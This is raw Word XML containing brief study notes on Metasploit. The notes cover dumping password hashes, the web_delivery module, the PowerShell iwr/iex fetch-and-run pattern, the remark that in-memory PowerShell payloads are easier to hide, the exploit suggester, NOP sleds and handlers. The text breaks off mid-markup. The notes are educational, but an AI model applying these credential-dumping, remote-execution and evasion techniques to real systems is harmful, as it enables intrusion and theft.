    <w:p w14:paraId="5624B084" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66281D2E" w14:textId="7A0D6C82" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">db_export pwdump </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD722D" w14:textId="1F45658B" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>dumps password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771212D1" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B68E067" w14:textId="094286D3" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>exploit / run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5175884A" w14:textId="0A19A23D" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-j (job) -z (backgrounds payload handler)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA538E" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32642BCE" w14:textId="10EB73BF" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>exploit/multi/script/web_delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F140AC" w14:textId="2219AF72" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>web server that serves up shell code for different programming languages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4AE13A" w14:textId="445EB145" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">iwr - invoke web request (powershell) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF2047" w14:textId="1487875C" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>tells web server to go get this thing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E137A8" w14:textId="49CFE03F" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">iex - says run this </w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9" w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>powershell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6620EFE3" w14:textId="33807EBC" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">prefer PSH (binary) because it's easier on </w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9" w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>msf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189FB8B9" w14:textId="367C0173" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">binary you can't see what happened command by command and in just PSH you can </w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9" w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>see.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427E6234" w14:textId="0572623E" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">PSH writes to memory and is more easily hidden, binary writes to disk and is more </w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9" w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A4C4C" w14:textId="07026B43" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="00EB2AB9" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> you specify binary, you can specify any binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259DA633" w14:textId="79EB29B4" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">can specify a custom </w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9" w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFDBAE9" w14:textId="0E55A318" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">in PSH memory, it can only use </w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9" w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9" w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF841F4" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B5DB2EF" w14:textId="2BC89879" w:rsidR="00EB2AB9" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D0AA31" w14:textId="498E3585" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>runs modules' checks against sessions to see if any are positive</w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1DF477" w14:textId="3826DB44" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will give info and exploits</w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A384AD3" w14:textId="607D0B49" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>runs on multiple OSs because it is in multi</w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9B7970" w14:textId="45B6A12F" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>occasionally returns false positives</w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338E9009" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C8E2DC" w14:textId="7253D74E" w:rsidR="00EB2AB9" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">interfaces are how you talk to </w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9" w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DFD3CE" w14:textId="5CD48100" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>msgpackrpc - automatable metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD5509" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4413E2" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NOP - no operation (x90)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABBA83B" w14:textId="2126BF0D" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>use a nopsled to skip to part of memory where shell code is</w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C31C530" w14:textId="7E2D0BB3" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>should never see the NOPs in a row, attack is likely happening</w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C668F8A" w14:textId="667C1449" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>snort and IDSs have detections for nopsleds</w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759D7772" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34FC5A35" w14:textId="4123280F" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Payload - load mod into msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501D7E97" w14:textId="2CD266A1" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="007B3D1E" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">can generate it into file </w:t>
      </w:r>
      <w:r w:rsidR="00EB2AB9" w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168E50CF" w14:textId="4C3D225D" w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9" w:rsidRDefault="00EB2AB9" w:rsidP="00EB2AB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>got to</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00EB2AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> use -o to specify output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBEC287" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D39B11F" w14:textId="1BD81404" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>to_handler - starts a handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594CEAAC" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F4910C" w14:textId="5D590BD2" w:rsidR="00A95E1B" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
